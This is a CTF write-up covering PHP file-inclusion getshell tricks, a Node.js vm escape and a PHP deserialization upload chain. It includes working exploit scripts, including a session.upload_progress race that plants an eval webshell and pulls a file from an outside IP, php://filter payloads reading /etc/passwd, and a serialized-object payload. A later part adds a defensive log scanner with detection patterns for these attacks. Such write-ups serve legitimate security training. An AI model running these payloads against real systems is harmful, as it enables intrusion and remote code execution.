[NPUCTF2020]ezinclude Knowledge point: some getshell tricks for file inclusion
https://coomrade.github.io/2018/10/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9Bgetshell%E5%A7%BF%E5%8A%BF/
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html?tdsourcetag=s_pcqq_aiomsg
After the upload succeeds, we can brute-force the file name. The tmp file names follow a pattern: they are all /tmp/php followed by a random 6-character combination of upper/lowercase letters and digits. The search space is fairly large, but it is feasible. Here is an exp:
```python
import string, requests, threading, Queue

charset = string.digits + string.letters
host = "123.207.99.17"
port = 80
base_url = "http://%s:%d" % (host, port)


def get_ready():
    queue = Queue.Queue()
    for i in charset:
        for j in charset:
            for k in charset:
                for l in charset:
                    for m in charset:
                        for n in charset:
                            filename = i + j + k + l + m + n
                            print 'putting ' + filename
                            queue.put(filename)
    workers = []
    for t in range(30):
        worker = threading.Thread(target=get, args=(queue,))
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()


def get(queue):
    try:
        while queue.qsize() != 0:
            filename = queue.get(block=False)
            brute_force_tmp_files(filename)
    except Exception as e:
        print e


def brute_force_tmp_files(filename):
    url = "%s/include.php?file=/tmp/php%s" % (base_url, filename)
    print url
    try:
        response = requests.get(url, timeout=2)
        if len(response.content) != 0:
            print "[+] Include success!"
            with open('success.txt', 'a') as f:
                f.write(filename + '\r\n')
            return True
    except Exception as e:
        print e
    return False


def main():
    get_ready()


if __name__ == "__main__":
    main()
```
php7 segment fault
The intended solution is to scan directories, which turns up dir.php. It lists all the files under /tmp.

We can use the php7 segment fault behaviour: when a request containing a file part is sent to PHP and PHP crashes and exits abnormally, the POSTed temporary file is kept.
php < 7.2:

```
php://filter/string.strip_tags/resource=/etc/passwd
```

php7, works on all old versions:

```
php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA
```
```python
import requests
from io import BytesIO

url = "http://f0af8aa4-9e9c-40a8-9003-175dbc6f69f8.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload = "<?php phpinfo();?>"
files = {"file": BytesIO(payload.encode())}
r = requests.post(url=url, files=files, allow_redirects=False)
print(r.text)
```
session.upload_progress
The PHP version is 7.0.33, which is above 5.4, so we can try session.upload_progress to include the session file:
```python
import io
import requests
import threading
import time

burp0_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
sessid = 'upload'
payload = '/tmp/sess_' + sessid
data = {
    'cf': payload,
    "cmd": "echo '11111111111';copy('http://47.94.0.250/2.txt','/tmp/mc');",
}
poy = {'http': '127.0.0.1:8080'}
url = 'http://c23abde6-a0a1-4078-804d-9ea570d5f263.node4.buuoj.cn/flflflflag.php'


def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(
            url,
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
            files={'file': ('tgao.txt', f)},
            cookies={'PHPSESSID': sessid},
            headers=burp0_headers,
        )
        time.sleep(0.5)


def read(session):
    while True:
        resp = session.post(url=url + '?file=' + payload, data=data, headers=burp0_headers)
        time.sleep(0.5)
        print(resp.url)
        print(resp.text)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
        event.set()
```
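A defender-side addition, not part of the original writeup: a small Python scanner that flags the include-parameter values these three techniques leave in an access log, namely php:// wrapper strings, /tmp/phpXXXXXX upload temp names (and any IP probing many of them, which is what the brute-force exp above looks like from the server side), and /tmp/sess_ session files. The log lines, the `file` parameter name and the threshold of 3 probes are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2021:10:00:01 +0000] "GET /include.php?file=/tmp/phpA1b2C3 HTTP/1.1" 200 0
10.0.0.5 - - [01/May/2021:10:00:01 +0000] "GET /include.php?file=/tmp/phpZz9Q0k HTTP/1.1" 200 0
10.0.0.5 - - [01/May/2021:10:00:02 +0000] "GET /include.php?file=/tmp/phpM4n5O6 HTTP/1.1" 200 0
10.0.0.7 - - [01/May/2021:10:00:03 +0000] "GET /flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd HTTP/1.1" 200 812
10.0.0.9 - - [01/May/2021:10:00:04 +0000] "POST /flflflflag.php?file=/tmp/sess_upload HTTP/1.1" 200 120
10.0.0.11 - - [01/May/2021:10:00:05 +0000] "GET /include.php?file=about.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+"')
# Include-parameter shapes matching the three techniques in the writeup (order = priority).
PATTERNS = {
    "php_wrapper":    re.compile(r"^(php|data|phar|zip|expect)://", re.I),  # php://filter, data://
    "upload_tmpfile": re.compile(r"^/tmp/php[A-Za-z0-9]{6}$"),               # /tmp/phpXXXXXX
    "session_file":   re.compile(r"^/tmp/sess_[A-Za-z0-9,-]+$"),             # session.upload_progress
    "traversal":      re.compile(r"(\.\./|/etc/passwd)"),
}

def classify(value):
    """Return the first matching category for an include-parameter value, or None if it looks benign."""
    for name, pattern in PATTERNS.items():
        if pattern.search(value):
            return name
    return None

def analyse(log_text, param="file", brute_threshold=3):
    """Scan log lines; report suspicious include values and IPs probing many /tmp/php names."""
    findings = []
    tmp_probes = Counter()
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):  # parse_qs URL-decodes
            category = classify(value)
            if category:
                findings.append((ip, category, value))
            if category == "upload_tmpfile":
                tmp_probes[ip] += 1
    brute = sorted(ip for ip, n in tmp_probes.items() if n >= brute_threshold)
    return {"findings": findings, "brute_force_ips": brute}

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```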
What I personally need to note is this! Are the locations for these two getshell methods the same? The session one should be the generated session file! The temporary file generated under /tmp is the temporary file of the uploaded file! The uploaded temporary file and the session file may possibly be stored in different locations! Take note! 🙄
[HFCTF2020]JustEscape Knowledge point: nodejs vm escape

I'm not familiar with this! Too hard! Read the masters' articles! For a problem like this, just try to understand it! I can only read the js code!
Trigger an error: Error().stack
https://blog.csdn.net/qq_43478096/article/details/109231567?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-4.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-4.control
[强网杯 2019]Upload Knowledge point: php code audit!

```php
<?php
namespace app\web\controller;

use think\Controller;

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
}

class Register
{
    public $checker;
    public $registed;
}

$profile = new Profile();
$profile->except = ['index' => 'my_is_upload'];
$profile->my_is_upload = "upload_img";
$profile->ext = "122";
$profile->filename_tmp = "./upload/ea6cf191dc7eec7b0e43199e459204e5/a.php";
$profile->filename = "./upload/ea6cf191dc7eec7b0e43199e459204e5/my_is_upload.php";

$register = new Register();
$register->registed = false;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));
```
Code auditing is a headache, it makes my hair fall out! But the feeling when it all suddenly clicks is awesome! 😋😋😋😋
Approach:

Use the Register class as the entry point! Call the Profile class's __call method! Then, through __call, call the __get method! Finally we come back to

```php
$this->{$this->{$name}}($arguments);
```

Calling my_is_upload() is calling the upload_img method!
The first two ifs inside the method are both bypassed and not executed! It goes straight to:
```php
if ($this->ext) {
    if (getimagesize($this->filename_tmp)) {
        @copy($this->filename_tmp, $this->filename);
        @unlink($this->filename_tmp);
        $this->img = "../upload/$this->upload_menu/$this->filename";
        $this->update_img();
    }
}
```
Just make sure the uploaded file is an image 🐎 (a webshell that passes as an image)!
```php
$profile->filename_tmp = "./upload/ea6cf191dc7eec7b0e43199e459204e5/a.php";
$profile->filename = "./upload/ea6cf191dc7eec7b0e43199e459204e5/my_is_upload.php";
```
😶😶 I don't know why, but I'm enjoying reading code slowly more and more!